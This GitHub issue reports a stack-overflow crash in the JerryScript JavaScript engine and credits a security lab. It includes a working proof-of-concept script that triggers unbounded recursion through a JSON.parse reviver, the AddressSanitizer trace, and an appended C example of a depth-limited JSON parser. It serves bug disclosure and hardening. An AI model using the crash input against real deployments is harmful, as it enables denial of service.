jerryscript-project / jerryscript

Ultra-lightweight JavaScript engine for the Internet of Things.
https://jerryscript.net
Apache License 2.0

AddressSanitizer: stack-overflow #5074

Open Ye0nny opened 1 year ago

Ye0nny commented 1 year ago
JerryScript revision

Commit: https://github.com/jerryscript-project/jerryscript/commit/05dbbd134c3b9e2482998f267857dd3722001cd7 Version: v3.0.0

Build platform

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)

Build steps

```sh
python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20
```
Test case

```javascript
// testcase
JSON.parse("[1,2,2,4,4,4,4,4,4,4,8,8,0,1,2,2,4,4,4,4,8,8,0]", function (func0, t) {
  return "[".repeat(32768) + JSON.parse(t);
});
str = "[32" + str + "2>]";
str += "32:32===]";
for (i = 0; i < 2048; i++) JSON.parse.call(str, i);
str += "1,";
str += "1]";
JSON.parse(str);
```

```javascript
// poc.js
JSON.parse("[1,2,2,4,4,4,4,4,4,4,8,8,0,1,2,2,4,4,4,4,8,8,0]", function (func0, t) {
  return "[".repeat(32768) + JSON.parse(t);
});
```
Execution steps & Output
$ ./jerryscript/build/bin/jerry poc.js
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1402144==ERROR: AddressSanitizer: stack-overflow on address 0xff64bfec (pc 0x081100a7 bp 0x00000000 sp 0xff64bff0 T0)
    #0 0x81100a7 in __sanitizer::StackDepotBase<__sanitizer::StackDepotNode, 1, 20>::Put(__sanitizer::StackTrace, bool*) (./jerryscript/build/bin/jerry+0x81100a7)
    #1 0x811007e in __sanitizer::StackDepotPut(__sanitizer::StackTrace) (./jerryscript/build/bin/jerry+0x811007e)
    #2 0x807a2d1 in __asan::Allocator::Allocate(unsigned long, unsigned long, __sanitizer::BufferedStackTrace*, __asan::AllocType, bool) (./jerryscript/build/bin/jerry+0x807a2d1)
    #3 0x8079ceb in __asan::asan_malloc(unsigned long, __sanitizer::BufferedStackTrace*) (./jerryscript/build/bin/jerry+0x8079ceb)
    #4 0x80efec3 in malloc (./jerryscript/build/bin/jerry+0x80efec3)
    #5 0x825f11c in jmem_heap_alloc ./jerryscript/jerry-core/jmem/jmem-heap.c:254:10
    #6 0x825f11c in jmem_heap_gc_and_alloc_block ./jerryscript/jerry-core/jmem/jmem-heap.c:291:24
    #7 0x8185a9d in ecma_create_object ./jerryscript/jerry-core/ecma/base/ecma-helpers.c:94:38
    #8 0x81cb9ab in ecma_op_alloc_array_object ./jerryscript/jerry-core/ecma/operations/ecma-array-object.c:58:5
    #9 0x81cb9ab in ecma_op_new_array_object ./jerryscript/jerry-core/ecma/operations/ecma-array-object.c:110:29
    #10 0x81a8a86 in ecma_builtin_json_parse_value ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:562:32
    #11 0x81a8fd8 in ecma_builtin_json_parse_value ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:573:30
    #12 0x81a8fd8 in ecma_builtin_json_parse_value ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:573:30
    ... 
    ...
    #243 0x81a8fd8 in ecma_builtin_json_parse_value ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:573:30
    #244 0x81a8fd8 in ecma_builtin_json_parse_value ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:573:30
    #245 0x81a8fd8 in ecma_builtin_json_parse_value ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:573:30
    #246 0x81a8fd8 in ecma_builtin_json_parse_value ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:573:30

SUMMARY: AddressSanitizer: stack-overflow (./jerryscript/build/bin/jerry+0x81100a7) in __sanitizer::StackDepotBase<__sanitizer::StackDepotNode, 1, 20>::Put(__sanitizer::StackTrace, bool*)
==1402144==ABORTING

Credits: @Ye0nny, @EJueon of the seclab-yonsei.
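The trace shows `ecma_builtin_json_parse_value` recursing once per nesting level with nothing bounding the depth, so the 32768 opening brackets the reviver builds exhaust the native stack. As an added example (not JerryScript's code), here is a recursive-descent JSON walker with an explicit nesting limit that rejects such input cleanly instead of overflowing; `JSON_MAX_DEPTH`, `json_check_depth` and `make_nested` are hypothetical names chosen for this illustration.

```c
/* Added example, not JerryScript code: a depth-bounded recursive JSON walker. */
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

#define JSON_MAX_DEPTH 512 /* hypothetical limit; pick it from the target's stack budget */

enum json_rc { JSON_OK = 0, JSON_BAD_SYNTAX = 1, JSON_TOO_DEEP = 2 };

static void skip_ws(const char **p) { while (**p == ' ' || **p == '\n' || **p == '\t' || **p == '\r') (*p)++; }
static enum json_rc parse_value(const char **p, size_t depth);

/* Walks a '[...]' or '{...}' body; depth is the nesting level of this container. */
static enum json_rc parse_container(const char **p, char close, size_t depth)
{
  if (depth > JSON_MAX_DEPTH) return JSON_TOO_DEEP; /* the guard: fail before recursing deeper */
  (*p)++;                                            /* consume the opening bracket */
  skip_ws(p);
  if (**p == close) { (*p)++; return JSON_OK; }      /* empty container */
  for (;;) {
    if (close == '}') {                              /* object member: "key" : value */
      skip_ws(p);
      if (**p != '"') return JSON_BAD_SYNTAX;
      enum json_rc krc = parse_value(p, depth);      /* a key is a string, it does not nest */
      if (krc != JSON_OK) return krc;
      skip_ws(p);
      if (*(*p)++ != ':') return JSON_BAD_SYNTAX;
    }
    enum json_rc rc = parse_value(p, depth);
    if (rc != JSON_OK) return rc;
    skip_ws(p);
    if (**p == ',') { (*p)++; continue; }
    if (**p == close) { (*p)++; return JSON_OK; }
    return JSON_BAD_SYNTAX;
  }
}

static enum json_rc parse_value(const char **p, size_t depth)
{
  skip_ws(p);
  if (**p == '[') return parse_container(p, ']', depth + 1);
  if (**p == '{') return parse_container(p, '}', depth + 1);
  if (**p == '"') {                                  /* string, honouring backslash escapes */
    for ((*p)++; **p != '"'; (*p)++) {
      if (**p == '\0') return JSON_BAD_SYNTAX;
      if (**p == '\\' && *++(*p) == '\0') return JSON_BAD_SYNTAX;
    }
    (*p)++;
    return JSON_OK;
  }
  const char *start = *p;                            /* number / true / false / null token */
  while (**p && strchr("-+.0123456789eEtrufalsn", **p)) (*p)++;
  return *p > start ? JSON_OK : JSON_BAD_SYNTAX;
}

/* Validates a NUL-terminated JSON text; returns JSON_TOO_DEEP instead of recursing without bound. */
enum json_rc json_check_depth(const char *text)
{
  const char *p = text;
  enum json_rc rc = parse_value(&p, 0);
  if (rc != JSON_OK) return rc;
  skip_ws(&p);
  return *p == '\0' ? JSON_OK : JSON_BAD_SYNTAX;
}

/* Constructed input shaped like the reviver's output above: n '[' characters followed by "1". */
char *make_nested(size_t n)
{
  char *s = malloc(n + 2);
  memset(s, '[', n);
  s[n] = '1';
  s[n + 1] = '\0';
  return s;
}
```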